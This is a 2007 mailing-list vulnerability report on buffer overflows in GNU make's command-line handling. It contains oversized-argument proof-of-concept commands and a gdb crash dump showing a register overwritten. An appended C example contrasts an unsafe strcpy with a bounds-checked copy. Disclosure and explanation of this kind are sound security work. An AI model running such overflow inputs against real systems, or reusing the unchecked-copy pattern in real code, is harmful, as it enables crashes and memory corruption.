bug-make

make multiple buffer overflow


From: laurent gaffie
Subject: make multiple buffer overflow
Date: Thu, 6 Dec 2007 00:08:30 -0500

Application: Make <= 3.81
Web Site: http://savannah.gnu.org/projects/make/ & http://www.gnu.org/software/make/
Platform: Unix
Bug: multiple buffer overflow

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

Make is a tool which controls the generation of executables and other non-source files of a program from the program's source files.

Make gets its knowledge of how to build your program from a file called the makefile, which lists each of the non-source files and how to compute it from other files. When you write a program, you should write a makefile for it, so that it is possible to use Make to build and install the program.

======
2) Bug
======
Make doesn't filter any value submitted on the command line, so it is possible to trigger some exploitable buffer overflows.

=====
3) Proof of concept
=====

Proof of concept example:
make `perl -e 'print"A"x4096'` // ***
make -f `perl -e 'print"A"x4096'`
make -j `perl -e 'print"A"x4096'`
make -i `perl -e 'print"A"x4096'`
make -l `perl -e 'print"A"x4096'`

*** Depending on the case, you'll need to change the value by a couple more A's; playing by hundreds should be good to make sure you trigger it.

address@hidden:~# gdb make
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
.................
..........
...
(gdb) run `perl -e 'print"A"x4296'` // my GCC version has stack-smashing protection, so 200 chars more and we trigger it
Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1209637200 (LWP 1246)]
make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA
AAAAA.........AAAAAAAAAA....
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1209637200 (LWP 1246)]
0x08052ac5 in ?? ()
(gdb) i r
eax 0xbfffa930 -1073764048
ecx 0x0 0
edx 0x0 0
ebx 0x41414141 1094795585 // got overwritten here
esp 0xbfff8570 0xbfff8570
ebp 0xbfffa918 0xbfffa918
esi 0x80868f8 134768888
edi 0x8081560 134747488
eip 0x8052ac5 0x8052ac5 <address@hidden>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)

========
4) Greets
========
Deimos, Benjilenoob, team soh, #futurezone, #soh, #nibbles

=====
5) Credits
=====
mwoa!
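Added illustration, not code from GNU make and not part of the original report: the pattern the report describes (a command-line argument copied into a fixed-size buffer with no length check) next to a bounded version that measures the input first and rejects anything that does not fit. `ARG_BUF_SIZE`, `copy_arg_checked`, `handle_target_arg` and the constructed 4296-byte string of 'A's are assumptions made for this demonstration only; the size of the real buffers, if any, is not stated in the report.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the demonstration (not a value from make). */
#define ARG_BUF_SIZE 256

/* Unsafe pattern: copies however many bytes the caller supplies. With an
 * argument longer than ARG_BUF_SIZE - 1 this writes past the end of dst,
 * which is the crash class the report describes. Shown for contrast;
 * it is never called with over-long input here. */
int copy_arg_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
    return 0;
}

/* Hardened pattern: measure the argument, refuse it if it does not fit
 * (including the terminating NUL), and only then copy. Returns 0 on
 * success and -1 when the argument is rejected; dst is untouched on -1. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t len = strlen(arg);
    if (dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Builds a constructed test input: n copies of 'A', as in the report's
 * `perl -e 'print"A"x4296'`. Caller frees the result. */
char *make_a_string(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* Hypothetical argument handler with a stack buffer of ARG_BUF_SIZE bytes.
 * Returns 0 if the argument was accepted, -1 if it was rejected as too long. */
int handle_target_arg(const char *arg)
{
    char buf[ARG_BUF_SIZE];
    if (copy_arg_checked(buf, sizeof buf, arg) != 0)
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    /* With no argument, use a constructed over-long input to show the rejection path. */
    char *constructed = NULL;
    const char *arg;
    if (argc > 1) {
        arg = argv[1];
    } else {
        constructed = make_a_string(4296);
        arg = constructed ? constructed : "all";
    }
    int rc = handle_target_arg(arg);
    if (rc != 0)
        fprintf(stderr, "argument rejected: %zu bytes, limit is %d\n",
                strlen(arg), ARG_BUF_SIZE - 1);
    else
        printf("accepted target: %s\n", arg);
    free(constructed);
    return rc == 0 ? 0 : 2;
}
```

The point of the check is that the length is compared against the destination size before any byte is written, so an argument of 4096 or 4296 bytes produces a clean error return instead of overwriting the stack; a crash of the kind shown in the gdb session above is only possible when that comparison is absent.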
